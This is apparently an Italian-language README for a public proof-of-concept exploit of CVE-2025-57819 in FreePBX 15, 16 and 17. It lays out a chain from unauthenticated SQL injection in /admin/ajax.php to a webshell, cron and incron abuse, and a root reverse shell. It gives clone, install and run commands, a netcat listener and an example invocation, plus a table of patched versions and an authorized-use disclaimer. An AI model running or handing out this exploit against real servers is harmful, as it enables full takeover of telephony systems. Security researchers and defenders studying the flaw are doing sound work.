
Catena completa di CVE-2025-57819 PoC per FreePBX 15, 16 e 17: SQLi non autenticato a RCE e acquisizione dei privilegi di root.
PoC a catena completa per CVE-2025-57819. Iniezione SQL basata su errori non autenticata nel modulo endpoint di FreePBX che si trasforma in una shell root tramite iniezione di cron job ed escalation di privilegi incron.
Solo per test autorizzati e ricerca. Non utilizzare contro sistemi che non possiedi.
SQLi (EXTRACTVALUE) → INSERT cron job → webshell drop → incron trigger → root shell
/admin/ajax.phpasteriskfwconsole come rootgit clone https://github.com/ozcanpng/CVE-2025-57819-FreePBX-RCE2Root
cd CVE-2025-57819-FreePBX-RCE2Root
pip install -r requirements.txt
python3 CVE-2025-57819.py <target> <lhost> <lport> [--cleanup]
Avvia prima un listener:
nc -lvnp 9999
Poi esegui:
python3 CVE-2025-57819.py freepbx.example.com 192.168.1.50 9999
--cleanup rimuove la webshell e il cron job dopo lo sfruttamento.
FreePBX con il modulo endpoint installato. Il parametro brand in /admin/ajax.php viene passato non sanificato in una query SQL.
| FreePBX | Versione corretta |
|---|---|
| 15.x | 15.0.66 |
| 16.x | 16.0.89 |
| 17.x | 17.0.3 |
ozcanpng — github.com/ozcanpng — ozcanpng.dev